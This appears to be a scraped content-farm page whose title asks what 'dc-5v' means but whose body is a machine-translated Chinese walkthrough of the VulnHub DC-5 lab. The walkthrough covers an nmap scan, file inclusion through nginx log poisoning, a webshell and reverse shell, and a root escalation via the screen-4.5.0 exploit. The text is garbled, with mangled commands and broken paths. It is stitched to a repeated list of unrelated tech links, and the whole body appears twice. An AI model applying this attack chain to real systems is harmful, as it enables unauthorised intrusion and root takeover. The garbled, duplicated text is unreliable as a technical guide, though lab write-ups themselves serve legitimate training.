dc-5v(dc5v是什么意思)
本文主要介绍dc-5v(dc5v是什么意思),下面一起看看dc-5v(dc5v是什么意思)相关资讯。
准备工作在vulnhub官网下载dc:5无人机dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出开放端口较少。经过查询,111端口发现没有任何东西可以访问80端口。
观察页面,发现联系人页面可以提交东西。
但是刷新几次后,你会发现后面的时间会发生变化,说明页面是动态的,可能包含文件。
测试没有问题。这里有两点需要说明:文件和foot测试可以一个一个做。footer.php在这里被认为是一个暗示。其实还是需要一个强大的目录字典和目录扫描工具(burpsuit也可以)来猜测。
该文件包含一个试图包含nginx的日志文件。默认的日志路径是/var/log/var/log/nginx/access . log
成功!/hackyou然后用蚂蚁剑连接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打开虚拟终端,弹回外壳。这个外壳不稳定。
然后用python弹壳。
python-c 导入ptypty.spawn。;/bin/bash ;) 权限提升检查是否有无密码root权限,进入命令行。
find/-perm -u=s -type f 2/dev/null发现screen-4.5.0可疑。尝试使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp复制到/tmp目录分别编译两个短代码。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上传到目标机/tmp目录下,安装在sh脚本上执行获取shell获取标志。
参考文1_ry-dc-5靶机对红小豆饼的侵彻记录_dc-5。
标签:
目标文件
了解更多dc-5v(dc5v是什么意思)相关内容请关注本站点。
笔记本按键介绍图,笔记本电脑键盘
华为手机拍照技巧集锦(华为手机拍照有哪些技巧)
小米手机关闭广告的方法(小米手机怎么能关闭广告)
mate20参数配置(华为mate20各个机型参数配置对比)
笔记本电脑无法开机怎么回事儿
dc-5v(dc5v是什么意思)
fodhelper.exe是什么程序老是自动弹出(fodhelper老弹出)
酷派5950怎么连接电脑,酷派5950怎么连接电脑
苹果电脑安装双系统怎么样(苹果电脑安装双系统后还可以改回去吗)
win7里没有运行(win7怎么没有运行程序)
安卓手机没有文件管理怎么办
笔记本m2接口图片大全,懂m2固态的来现在的m2固态有几种接口一样的吗
个人用笔记本电脑什么牌子好,笔记本电脑那个品牌好
云服务器怎么装安卓模拟器(云服务器挂游戏教程)
三星502怎么降到444,三星p520静音模式怎么退出啊
小爱同学电脑开关机(小爱同学如何开关电脑)
八千左右的电脑主机(八千左右的主机配置)
手提电脑如何锁键盘(手提电脑怎么把键盘锁掉)
win10 hdmi接口没反应(win10显示hdmi)
win7升级win10要钱吗(win7升级到10要钱吗)
准备工作在vulnhub官网下载dc:5无人机dc-5。
信息收集nmap -a -t4 -sv -p-192.168.1.14可以看出开放端口较少。经过查询,111端口发现没有任何东西可以访问80端口。
观察页面,发现联系人页面可以提交东西。
但是刷新几次后,你会发现后面的时间会发生变化,说明页面是动态的,可能包含文件。
测试没有问题。这里有两点需要说明:文件和foot测试可以一个一个做。footer.php在这里被认为是一个暗示。其实还是需要一个强大的目录字典和目录扫描工具(burpsuit也可以)来猜测。
该文件包含一个试图包含nginx的日志文件。默认的日志路径是/var/log/var/log/nginx/access . log
成功!/hackyou然后用蚂蚁剑连接 192 . 168 . 1 . 14/thank you . php?file=/var/log/nginx/access.log打开虚拟终端,弹回外壳。这个外壳不稳定。
然后用python弹壳。
python-c 导入ptypty.spawn。;/bin/bash ;) 权限提升检查是否有无密码root权限,进入命令行。
find/-perm -u=s -type f 2/dev/null发现screen-4.5.0可疑。尝试使用searchsploit搜索漏洞。
searchsploit -p 41154.sh查看位置cp/usr/share/exploited b/exploited b/linux/local/41154 . sh/tmp复制到/tmp目录分别编译两个短代码。
gcc-fpic-shared-ldl-otmp/lib hax . sotmp/lib hax . cgcc-otmp/rootshelltmp/rootshellc,然后用ant sword把文件上传到目标机/tmp目录下,安装在sh脚本上执行获取shell获取标志。
参考文1_ry-dc-5靶机对红小豆饼的侵彻记录_dc-5。
标签:
目标文件
了解更多dc-5v(dc5v是什么意思)相关内容请关注本站点。
笔记本按键介绍图,笔记本电脑键盘
华为手机拍照技巧集锦(华为手机拍照有哪些技巧)
小米手机关闭广告的方法(小米手机怎么能关闭广告)
mate20参数配置(华为mate20各个机型参数配置对比)
笔记本电脑无法开机怎么回事儿
dc-5v(dc5v是什么意思)
fodhelper.exe是什么程序老是自动弹出(fodhelper老弹出)
酷派5950怎么连接电脑,酷派5950怎么连接电脑
苹果电脑安装双系统怎么样(苹果电脑安装双系统后还可以改回去吗)
win7里没有运行(win7怎么没有运行程序)
安卓手机没有文件管理怎么办
笔记本m2接口图片大全,懂m2固态的来现在的m2固态有几种接口一样的吗
个人用笔记本电脑什么牌子好,笔记本电脑那个品牌好
云服务器怎么装安卓模拟器(云服务器挂游戏教程)
三星502怎么降到444,三星p520静音模式怎么退出啊
小爱同学电脑开关机(小爱同学如何开关电脑)
八千左右的电脑主机(八千左右的主机配置)
手提电脑如何锁键盘(手提电脑怎么把键盘锁掉)
win10 hdmi接口没反应(win10显示hdmi)
win7升级win10要钱吗(win7升级到10要钱吗)